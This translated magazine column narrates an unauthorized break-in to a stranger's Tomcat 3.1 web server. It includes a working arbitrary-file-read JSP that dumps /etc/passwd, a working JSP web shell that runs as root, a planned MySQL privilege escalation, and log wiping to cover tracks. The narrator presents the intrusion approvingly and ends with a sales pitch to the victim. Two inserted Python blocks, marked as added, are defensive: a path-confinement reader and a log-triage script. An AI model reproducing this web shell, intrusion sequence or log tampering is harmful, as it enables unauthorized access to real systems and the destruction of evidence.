Editor's note: "On-the-Spot Documentary" is a new small column in the Hacker Attack and Defense section. Here we present some real online hacking cases. Unlike the site-security articles we have run before, these cases describe the whole intrusion process from the hacker's point of view. From these examples you can learn a great deal about the technical tools and strategies hackers use to break into a web site. Specific technical details have been handled accordingly in this column, because our aim is to improve network security through this kind of technical exchange, not to maliciously attack other people's computers.
I happened to browse to a website whose pages were clean and pleasant to look at. The site was built with JSP, and out of personal interest I decided to test the security of its system.
    telnet www.target.com 8080
    GET /chinansl HTTP/1.1 [Enter] [Enter]
The server returned the following:
    HTTP/1.0 404 Not Found
    Date: Sun, April 2001 07:49:13 GMT
    Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
    Content-Language: en
    Content-Type: text/html
    Status: 404

    <h1>Error: 404</h1>
    <h2>Location: /chinansl</h2>
    File Not Found<br>
    /chinansl
So the running web server is Tomcat 3.1. I remembered that a vulnerability in this version had been found and posted to Bugtraq.
As I recalled, the ".." (directory traversal) technique could presumably be used to escape the web directory, so I tried:
    http://target:8080/../../../../%00.jsp   (NO)
    http://target:8080/file/index.jsp        (NO)
    http://target:8080/index.JSP             (NO)
    http://target:8080/index.jsp%81          (NO)
    http://target:8080/index.js%70           (NO)
    http://target:8080/index.jsp%2581        (NO)
    http://target:8080/WEB-INF/              (NO)
The security situation looked fairly good, so I went a step deeper. Tomcat 3.1 ships with a management tool that lets you view the directories and files under the web root and add contexts. So I tried:
    http://target:8080/admin/
The administrator had neither deleted this directory nor restricted access to it; from a security standpoint this has to be considered a serious mistake.
Next I clicked the "VIEW ALL" button, which lists the names of files and directories under the web directory, and quickly found an upload component through which files can be uploaded to the target's web directory. Among the files there was this page:
    <%@ page import="java.io.*" %>
    <%-- reads whatever path the "file" parameter names and echoes it; nothing confines it to the web root --%>
    <%
        String file = request.getParameter("file");
        String str = "";
        FileInputStream fis = null;
        DataInputStream dis = null;
        try {
            fis = new FileInputStream(file);
            dis = new DataInputStream(fis);
            while (true) {
                try {
                    str = dis.readLine();
                } catch (Exception e) {}
                if (str == null) break;
                out.print(str + "<br>");
            }
        } catch (IOException e) {}
    %>
Then I requested:
    http://target:8080/upload/test.jsp?file=/etc/passwd
The password file came out. The next step was to try guessing passwords, without success. But what I had now was effectively a shell, so if I could not guess a password I would just use IE as my shell environment for the time being.
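As an added example, not code from the original article, here is the hardened form of the file-reading page above, written in Python rather than JSP so it runs stand-alone: the client-supplied name is confined to one upload root by canonicalizing and prefix-checking, the check test.jsp lacks. The upload root and the file report.txt are constructed for the demo.

```python
import os
import tempfile

def safe_resolve(file_param: str, root: str):
    """Return an absolute path inside `root`, or None if the request is refused.

    Canonicalize, then compare with the canonical root (what Java's
    File.getCanonicalPath() gives you); a textual ".." test misses
    %2e%2e encodings and symlinks.
    """
    if not file_param or "\x00" in file_param:
        return None                      # null-byte truncation tricks
    if os.path.isabs(file_param):
        return None                      # "/etc/passwd" is never a valid name
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, file_param))
    # commonpath() also rejects look-alike siblings such as "<root>-old",
    # which a plain startswith(root_real) would wrongly accept.
    if candidate == root_real or os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate

def safe_read(file_param: str, root: str) -> str:
    """Hardened counterpart of test.jsp: only files under `root` are served."""
    path = safe_resolve(file_param, root)
    if path is None:
        raise PermissionError("refused: " + repr(file_param))
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()

def demo() -> dict:
    """Constructed upload/ root with one file; try the requests test.jsp would accept."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "report.txt"), "w") as fh:
            fh.write("quarterly figures")
        for req in ["report.txt", "../../../etc/passwd",
                    "/etc/passwd", "report.txt\x00.jsp"]:
            try:
                results[req] = safe_read(req, root)
            except PermissionError:
                results[req] = "REFUSED"
    return results

if __name__ == "__main__":
    for req, outcome in demo().items():
        print(repr(req), "->", outcome)
```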
So I wrote a JSP file:
    <%@ page import="java.io.*" %>
    <%-- runs the value of the "cmd" parameter and streams the process output back to the browser --%>
    <%
        try {
            String cmd = request.getParameter("cmd");
            Process child = Runtime.getRuntime().exec(cmd);
            InputStream in = child.getInputStream();
            int c;
            while ((c = in.read()) != -1) {
                out.print((char) c);
            }
            in.close();
            try {
                child.waitFor();
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
        } catch (IOException e) {
            System.err.println(e);
        }
    %>
I uploaded this JSP through the upload component, and now I had a shell:
    http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(Detailed results are not listed here.)
How to get root? After some searching I found that MySQL was installed on the system, and I got the MySQL password from the JSP source code. Then I ran:
    http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
Output:
    root 87494 0.2 1.9 17300 4800 p0-s 28Jun01 5:54.72 /usr/local/data/mysql
So MySQL was running as root. Then I thought: since I now know the MySQL password, I could write a shell program, have MySQL create a table, put my data into it, and then use "SELECT ... INTO OUTFILE" to create a file on the system that makes the user run my program when executing su. (Remember the apache.org break-in? That is the method the hackers used.)
After that it would be simple: upload something like a bindshell, run it, get nobody's permissions, and use the setuid shell created via su root to become root.
But when I actually tried it, the result was quite unexpected:
    http://target:8080/upload/cmd.jsp?cmd=id
Output:
    uid=0(root) gid=0(XXX) groups=0(XXX),2(XXX),3(XXX),4(XXX),5(XXX),(XXX),(XXX)
It turned out this web shell was already root! Administrators, how exactly did you set up your security?
    http://target:8080/upload/cmd.jsp?cmd=ps+aux
Tomcat itself was running as root (output not listed).
The rest of the story:
1. Delete my telnet records.
2. Delete the HTTP logs.
To clear a log I used the following method: cat xxx | grep -v "IP" >> temp, then overwrote the original with the modified temp file.
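Added example, not from the original article: a small triage script in Python that flags the request pattern seen in this intrusion in common-log-format access logs (the Tomcat admin app, file= parameters pointing outside the web root, cmd= parameters sent to a JSP) and reports clients whose hits span the whole chain. The log lines and IP addresses are constructed for the demo; since the on-host log was rewritten with grep -v, this only helps when run on a copy forwarded off the host.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed common-log-format lines modelled on the requests above; not real data.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2001:07:49:13 +0000] "GET /chinansl HTTP/1.1" 404 112
203.0.113.7 - - [15/Apr/2001:07:50:02 +0000] "GET /../../../../%00.jsp HTTP/1.0" 404 112
203.0.113.7 - - [15/Apr/2001:07:52:40 +0000] "GET /admin/ HTTP/1.0" 200 2310
203.0.113.7 - - [15/Apr/2001:07:58:11 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 1870
198.51.100.4 - - [15/Apr/2001:08:01:00 +0000] "GET /upload/test.jsp?file=report.txt HTTP/1.0" 200 412
203.0.113.7 - - [15/Apr/2001:08:03:27 +0000] "GET /upload/cmd.jsp?cmd=ls+-la+/ HTTP/1.0" 200 3201
203.0.113.7 - - [15/Apr/2001:08:05:09 +0000] "GET /upload/cmd.jsp?cmd=ps+aux+|grep+mysqld HTTP/1.0" 200 96
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line: str):
    """Return (ip, status, reasons) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m["target"].partition("?")
    path = unquote(raw_path)                 # decode %2e%2e / %00 before testing
    params = parse_qs(query, keep_blank_values=True)
    reasons = []
    if "\x00" in path or "/../" in path or path.startswith("/.."):
        reasons.append("traversal-or-null-byte")
    if path == "/admin" or path.startswith("/admin/"):
        reasons.append("tomcat-admin-app")   # should be removed or access-controlled
    if any(v.startswith("/") or ".." in v for v in params.get("file", [])):
        reasons.append("file-param-outside-webroot")
    if path.endswith(".jsp") and "cmd" in params:
        reasons.append("command-parameter-to-jsp")
    return m["ip"], m["status"], reasons

def triage(log_text: str):
    """Suspicious hits, plus IPs whose hits span the admin-app and command stages."""
    hits, stages = [], {}
    for line in log_text.splitlines():
        c = classify(line)
        if c and c[2]:
            hits.append(c)
            stages.setdefault(c[0], set()).update(c[2])
    chained = sorted(ip for ip, s in stages.items()
                     if {"tomcat-admin-app", "command-parameter-to-jsp"} <= s)
    return hits, chained

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```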
To make my point clear: I did not change the site's pages, because I am just a network security enthusiast. So I sent an email to tell the system administrator! Of course, in passing I mentioned in the letter that UNITA Information Technology would be very happy to provide him with security services if needed.